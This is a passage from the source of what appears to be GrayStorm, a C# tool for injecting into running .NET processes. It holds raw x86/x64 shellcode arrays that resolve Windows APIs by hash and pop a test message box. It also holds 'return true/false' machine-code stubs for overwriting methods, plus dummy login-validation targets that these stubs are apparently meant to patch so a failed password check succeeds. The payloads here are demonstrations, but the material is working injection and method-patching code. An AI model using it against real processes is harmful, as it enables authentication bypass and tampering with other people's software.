142 | 0xe2, 0x8a, 0x62, 0x9e, 0xad, 0x32, 0x08, 0xf8, 0x0d, 0x43, 0xdd, 0x1a, 0x71, 0x0a, 0x6a,
143 | 0xe8, 0x01, 0x8d, 0xba, 0x20, 0xe9, 0xbc, 0x82, 0xef, 0xd4, 0x71, 0x0f, 0xf1, 0x11, 0xb5,
144 | 0xf0, 0x84, 0x69, 0xc6, 0x8d, 0x9e, 0xa9, 0xb5, 0x49, 0x2a, 0x2c, 0x1d, 0x19, 0x8c, 0x94,
145 | 0x9c, 0xce, 0x4b, 0x5e, 0x92, 0xbb, 0x18, 0x38, 0xb6, 0x3a, 0xcc, 0x32, 0xc2, 0xb7, 0xf3,
146 | 0x94, 0x43, 0x83, 0xd7, 0x30, 0x08, 0x57, 0x79, 0x60, 0xf4, 0x36, 0x86, 0x72, 0x50, 0xe6,
147 | 0x22, 0xf8, 0x72, 0xf3, 0x55, 0xa3, 0x18, 0x02, 0xd7, 0xd9, 0x65, 0x04, 0xe7, 0xe1, 0xc5,
148 | 0x6d, 0xd6, 0x6a, 0x8a, 0xea, 0xe7, 0xb8, 0xef, 0x05, 0xa2, 0xe1, 0x59, 0x8e, 0x6b, 0x70,
149 | 0xd8, 0xd3, 0x8b, 0xae, 0x1e, 0xea, 0x0f, 0x5b, 0xde, 0x09, 0x0f, 0x2e, 0xdb, 0x56, 0x97,
150 | 0xc2, 0x91, 0xc7, 0x72, 0xe5, 0x06, 0xe7, 0x56, 0x86, 0xc9, 0x7b, 0x3a, 0x67, 0x6c, 0xfc,
151 | 0xd9, 0x77
152 |
153 | };
154 |
155 | #endregion x86
156 |
157 | #region x64
158 |
159 | static public byte[] test64Bit = new byte[]
160 | {
161 | 0x48, 0x83, 0xec, 0x28, 0x48, 0x83, 0xe4, 0xf0, 0x65, 0x4c, 0x8b, 0x24,
162 | 0x25, 0x60, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0x64, 0x24, 0x18, 0x4d, 0x8b,
163 | 0x64, 0x24, 0x20, 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x7c, 0x24, 0x20,
164 | 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x64, 0x24, 0x20, 0xba, 0x8e, 0x4e,
165 | 0x0e, 0xec, 0x4c, 0x89, 0xe1, 0xe8, 0x68, 0x00, 0x00, 0x00, 0xeb, 0x34,
166 | 0x59, 0xff, 0xd0, 0xba, 0xa8, 0xa2, 0x4d, 0xbc, 0x48, 0x89, 0xc1, 0xe8,
167 | 0x56, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x4d, 0x31, 0xc9, 0xeb, 0x2c,
168 | 0x41, 0x58, 0xeb, 0x3a, 0x5a, 0x48, 0x31, 0xc9, 0xff, 0xd3, 0xba, 0x70,
169 | 0xcd, 0x3f, 0x2d, 0x4c, 0x89, 0xf9, 0xe8, 0x37, 0x00, 0x00, 0x00, 0x48,
170 | 0x31, 0xc9, 0xff, 0xd0, 0xe8, 0xc7, 0xff, 0xff, 0xff, 0x75, 0x73, 0x65,
171 | 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00, 0xe8, 0xcf, 0xff, 0xff,
172 | 0xff, 0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x66, 0x75, 0x6e,
173 | 0x21, 0x00, 0xe8, 0xc1, 0xff, 0xff, 0xff, 0x30, 0x78, 0x64, 0x65, 0x61,
174 | 0x64, 0x62, 0x65, 0x65, 0x66, 0x00, 0x49, 0x89, 0xcd, 0x67, 0x41, 0x8b,
175 | 0x45, 0x3c, 0x67, 0x45, 0x8b, 0xb4, 0x05, 0x88, 0x00, 0x00, 0x00, 0x45,
176 | 0x01, 0xee, 0x67, 0x45, 0x8b, 0x56, 0x18, 0x67, 0x41, 0x8b, 0x5e, 0x20,
177 | 0x44, 0x01, 0xeb, 0x67, 0xe3, 0x3f, 0x41, 0xff, 0xca, 0x67, 0x42, 0x8b,
178 | 0x34, 0x93, 0x44, 0x01, 0xee, 0x31, 0xff, 0x31, 0xc0, 0xfc, 0xac, 0x84,
179 | 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf4, 0x39, 0xd7,
180 | 0x75, 0xdd, 0x67, 0x41, 0x8b, 0x5e, 0x24, 0x44, 0x01, 0xeb, 0x31, 0xc9,
181 | 0x66, 0x67, 0x42, 0x8b, 0x0c, 0x53, 0x67, 0x41, 0x8b, 0x5e, 0x1c, 0x44,
182 | 0x01, 0xeb, 0x67, 0x8b, 0x04, 0x8b, 0x44, 0x01, 0xe8, 0xc3
183 | };
184 |
185 | static public byte[] test64BitMessageBox = new byte[]
186 | {
187 | 0x48, 0x83, 0xec, 0x28, 0x48, 0x83, 0xe4, 0xf0, 0x65, 0x4c, 0x8b, 0x24,
188 | 0x25, 0x60, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0x64, 0x24, 0x18, 0x4d, 0x8b,
189 | 0x64, 0x24, 0x20, 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x7c, 0x24, 0x20,
190 | 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x64, 0x24,
191 | 0x20, 0xba, 0x8e, 0x4e, 0x0e, 0xec, 0x4c, 0x89, 0xe1, 0xe8, 0x68, 0x00,
192 | 0x00, 0x00, 0xeb, 0x34, 0x59, 0xff, 0xd0, 0xba, 0xa8, 0xa2, 0x4d, 0xbc,
193 | 0x48, 0x89, 0xc1, 0xe8, 0x56, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x4d,
194 | 0x31, 0xc9, 0xeb, 0x2c, 0x41, 0x58, 0xeb, 0x3a, 0x5a, 0x48, 0x31, 0xc9,
195 | 0xff, 0xd3, 0xba, 0x70, 0xcd, 0x3f, 0x2d, 0x4c, 0x89, 0xf9, 0xe8, 0x37,
196 | 0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0xff, 0xd0, 0xe8, 0xc7, 0xff, 0xff,
197 | 0xff, 0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00,
198 | 0xe8, 0xcf, 0xff, 0xff, 0xff, 0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73,
199 | 0x20, 0x66, 0x75, 0x6e, 0x21, 0x00, 0xe8, 0xc1, 0xff, 0xff, 0xff, 0x30,
200 | 0x78, 0x64, 0x65, 0x61, 0x64, 0x62, 0x65, 0x65, 0x66, 0x00, 0x49, 0x89,
201 | 0xcd, 0x67, 0x41, 0x8b, 0x45, 0x3c, 0x67, 0x45, 0x8b, 0xb4, 0x05, 0x88,
202 | 0x00, 0x00, 0x00, 0x45, 0x01, 0xee, 0x67, 0x45, 0x8b, 0x56, 0x18, 0x67,
203 | 0x41, 0x8b, 0x5e, 0x20, 0x44, 0x01, 0xeb, 0x67, 0xe3, 0x3f, 0x41, 0xff,
204 | 0xca, 0x67, 0x42, 0x8b, 0x34, 0x93, 0x44, 0x01, 0xee, 0x31, 0xff, 0x31,
205 | 0xc0, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,
206 | 0xeb, 0xf4, 0x39, 0xd7, 0x75, 0xdd, 0x67, 0x41, 0x8b, 0x5e, 0x24, 0x44,
207 | 0x01, 0xeb, 0x31, 0xc9, 0x66, 0x67, 0x42, 0x8b, 0x0c, 0x53, 0x67, 0x41,
208 | 0x8b, 0x5e, 0x1c, 0x44, 0x01, 0xeb, 0x67, 0x8b, 0x04, 0x8b, 0x44, 0x01,
209 | 0xe8, 0xc3
210 | };
211 |
212 | static public byte[] returnTrue64 = new byte[]
213 | {
214 | 0x48, 0x31, 0xc0, //xor rax, rax
215 | 0x48, 0x83, 0xc0, 0x01, //add rax, 1
216 | 0xc3 //ret
217 | };
218 |
219 | static public byte[] returnFalse64 = new byte[]
220 | {
221 | 0x48, 0x31, 0xc0, //xor rax, rax
222 | 0xc3 //ret
223 | };
224 |
225 | static public byte[] SixtyFourbitHookTest = new byte[]
226 | {
227 | 0x48, 0x83, 0xec, 0x28, 0x48, 0x83, 0xe4, 0xf0, 0x65, 0x4c
228 | , 0x8b, 0x24,
229 | 0x25, 0x60, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0x64, 0x24, 0x18
230 | , 0x4d, 0x8b,
231 | 0x64, 0x24, 0x20, 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x7c
232 | , 0x24, 0x20,
233 | 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x64, 0x24, 0x20, 0xba
234 | , 0x8e, 0x4e,
235 | 0x0e, 0xec, 0x4c, 0x89, 0xe1, 0xe8, 0x6c, 0x00, 0x00, 0x00
236 | , 0xeb, 0x38,
237 | 0x59, 0xff, 0xd0, 0xba, 0xa8, 0xa2, 0x4d, 0xbc, 0x48, 0x89
238 | , 0xc1, 0xe8,
239 | 0x5a, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x4d, 0x31, 0xc9
240 | , 0xeb, 0x42,
241 | 0x41, 0x58, 0xeb, 0x2c, 0x5a, 0x48, 0x31, 0xc9, 0xff, 0xd3
242 | , 0x90, 0x90,
243 | 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90
244 | , 0x90, 0x90,
245 | 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xc3, 0xe8, 0xc3
246 | , 0xff, 0xff,
247 | 0xff, 0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c
248 | , 0x6c, 0x00,
249 | 0xe8, 0xcf, 0xff, 0xff, 0xff, 0x54, 0x68, 0x69, 0x73, 0x20
250 | , 0x69, 0x73,
251 | 0x20, 0x66, 0x75, 0x6e, 0x21, 0x00, 0xe8, 0xb9, 0xff, 0xff
252 | , 0xff, 0x30,
253 | 0x78, 0x64, 0x65, 0x61, 0x64, 0x62, 0x65, 0x65, 0x66, 0x00
254 | , 0x49, 0x89,
255 | 0xcd, 0x67, 0x41, 0x8b, 0x45, 0x3c, 0x67, 0x45, 0x8b, 0xb4
256 | , 0x05, 0x88,
257 | 0x00, 0x00, 0x00, 0x45, 0x01, 0xee, 0x67, 0x45, 0x8b, 0x56
258 | , 0x18, 0x67,
259 | 0x41, 0x8b, 0x5e, 0x20, 0x44, 0x01, 0xeb, 0x67, 0xe3, 0x3f
260 | , 0x41, 0xff,
261 | 0xca, 0x67, 0x42, 0x8b, 0x34, 0x93, 0x44, 0x01, 0xee, 0x31
262 | , 0xff, 0x31,
263 | 0xc0, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d
264 | , 0x01, 0xc7,
265 | 0xeb, 0xf4, 0x39, 0xd7, 0x75, 0xdd, 0x67, 0x41, 0x8b, 0x5e
266 | , 0x24, 0x44,
267 | 0x01, 0xeb, 0x31, 0xc9, 0x66, 0x67, 0x42, 0x8b, 0x0c, 0x53
268 | , 0x67, 0x41,
269 | 0x8b, 0x5e, 0x1c, 0x44, 0x01, 0xeb, 0x67, 0x8b, 0x04, 0x8b
270 | , 0x44, 0x01,
271 | 0xe8, 0xc3
272 | };
273 |
274 | #endregion x64
275 | }
276 | }
277 |
278 |
--------------------------------------------------------------------------------
/testClass.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 |
7 | namespace GrayStorm
8 | {
9 | class testClass
10 | {
11 | public bool returnStatement()
12 | {
13 | return false;
14 | }
15 |
16 | public void trueOrFalse()
17 | {
18 | int x;
19 | if (returnStatement())
20 | System.Windows.Forms.MessageBox.Show("True");
21 | else
22 | System.Windows.Forms.MessageBox.Show("False");
23 | }
24 |
25 | }
26 |
27 | class abc
28 | {
29 | //test function
30 | public bool validateLogin(string password, string savedPwd)
31 | {
32 | if (password == savedPwd)
33 | {
34 | return true;
35 | }
36 | else
37 | return false;
38 | }
39 |
40 | public static bool validateLoginSTATIC(string password, string savedPwd)
41 | {
42 | if (password == savedPwd)
43 | {
44 | return true;
45 | }
46 | else
47 | return false;
48 | }
49 |
50 | public static void loginStATIC()
51 | {
52 | if(validateLoginSTATIC("lol", "lol2"))
53 | {
54 | System.Windows.Forms.MessageBox.Show("Logged in");
55 | }
56 | else
57 | System.Windows.Forms.MessageBox.Show("Failed");
58 | }
59 |
60 | public void login()
61 | {
62 | if (validateLogin("lol", "lol2"))
63 | {
64 | System.Windows.Forms.MessageBox.Show("Logged in");
65 | }
66 | else
67 | System.Windows.Forms.MessageBox.Show("Failed");
68 |
69 | System.Diagnostics.StackTrace stackTrace = new System.Diagnostics.StackTrace ();
70 | System.Windows.Forms.MessageBox.Show(stackTrace.ToString());
71 | }
72 |
73 |
74 | }
75 | }
76 |
77 |
78 |
79 |
80 |
81 |
--------------------------------------------------------------------------------